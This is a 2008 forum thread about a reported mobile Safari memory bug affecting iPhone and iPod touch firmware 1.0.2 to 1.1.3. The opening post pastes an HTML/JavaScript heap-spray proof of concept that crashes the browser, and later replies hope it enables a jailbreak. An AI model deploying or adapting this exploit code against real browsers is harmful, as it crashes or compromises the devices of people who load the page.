New exploit

Discussion in 'iPod touch Firmware 1.1.3 Discussions' started by jimbeam, Feb 7, 2008.

Thread Status:
Not open for further replies.
  1. jimbeam

    jimbeam Active Member

    Joined:
    Nov 19, 2007
    Messages:
    3,694
    Likes Received:
    12
    Device:
    iPhone 3G (Black)
    Found this on engadget

    It's difficult to tell if this is just a little fear-mongering, or cause for real concern, but it looks like there's another iPhone / touch exploit out there lurking on the unseen horizons of those device's browsers. According to reports, a memory exploit -- similar to the previously-patched TIFF exploit -- has been discovered which affects units with firmware 1.0.2 all the way up to 1.1.3, thus carrying over to new 16GB iPhones and 32GB touches. Apparently, all you have to do is browse over to a site containing the malicious code, and it triggers a memory-exhausting script which causes the phone or iPod to crash. At this point, it doesn't appear to be anything more than a nuisance which can be easily circumvented by disabling JavaScript for Safari, though that hardly qualifies as a fix. To date, Apple hasn't issued a patch for the problem, but keep in mind it's only been a known issue since January 24th

    If the appsnapp devs can find this then we can have anouther one tap jailbreak for 1.1.3

    <html><body><script>

    function Demo() {

    var shellcode;
    var addr;
    var fill;

    alert('attempting a crash!');
    shellcode = unescape('%u0c0c');
    fill = unescape('%ucccc');
    addr = 0x02020202;

    var b = fill;
    while (b.length <= 0x40000) b+=b;

    var c = new Array();
    for (var i =0; i<36; i++) {
    c =
    b.substring(0, 0x100000 - shellcode.length) +
    shellcode +
    b.substring(0, 0x100000 - shellcode.length) +
    shellcode +
    b.substring(0, 0x100000 - shellcode.length) +
    shellcode +
    b.substring(0, 0x100000 - shellcode.length) +
    shellcode;
    }

    }

    </script>

    <input type='button' onClick='Demo()' value='Go!'>

    </body></html>
  2. simonrichards150

    simonrichards150 New Member

    Joined:
    Oct 29, 2007
    Messages:
    2,058
    Likes Received:
    94
    Device:
    iPod touch
  3. jimbeam

    jimbeam Active Member

    Joined:
    Nov 19, 2007
    Messages:
    3,694
    Likes Received:
    12
    Device:
    iPhone 3G (Black)
  4. Wolf

    Wolf New Member

    Joined:
    Dec 5, 2007
    Messages:
    30
    Likes Received:
    0
    Does this mean we can have another jailbreak like 1.1.1? (just go to the webpage and presto!)
  5. jimbeam

    jimbeam Active Member

    Joined:
    Nov 19, 2007
    Messages:
    3,694
    Likes Received:
    12
    Device:
    iPhone 3G (Black)
    maybe............................10 characters
  6. Steaps

    Steaps New Member

    Joined:
    Oct 24, 2007
    Messages:
    5,074
    Likes Received:
    41
    Device:
    iPod touch
    Sweeet. BLAH BLAH
  7. brenner14

    brenner14 New Member

    Joined:
    Dec 26, 2007
    Messages:
    85
    Likes Received:
    0
    Device:
    4G iPod touch
    Wow, let's hope this plays out!
  8. Teslanaut

    Teslanaut Well-Known Member

    Joined:
    Sep 16, 2007
    Messages:
    15,588
    Likes Received:
    177
    Device:
    4G iPod touch
    But the article said its only for 16 GB iPhones and 32 GB iPod Touches...

    Is there some different hardware or code in these new buffed devices?

    If so, I'm so exchanging

    Please Register or Log in to view images



    Still got some time on my purchase, hasn't been two weeks yet
  9. bulbous nub

    bulbous nub New Member

    Joined:
    Jan 9, 2008
    Messages:
    62
    Likes Received:
    0
    It says it affects all firmwares from 1.0.2 to 1.1.3, which carries over to the new 16/32s. Nothing is different other than the amount of storage backing it.
  10. Teslanaut

    Teslanaut Well-Known Member

    Joined:
    Sep 16, 2007
    Messages:
    15,588
    Likes Received:
    177
    Device:
    4G iPod touch
    Ohh, good, thanks for telling me that, now I can save over 200+ dollars! lol
Thread Status:
Not open for further replies.

Share This Page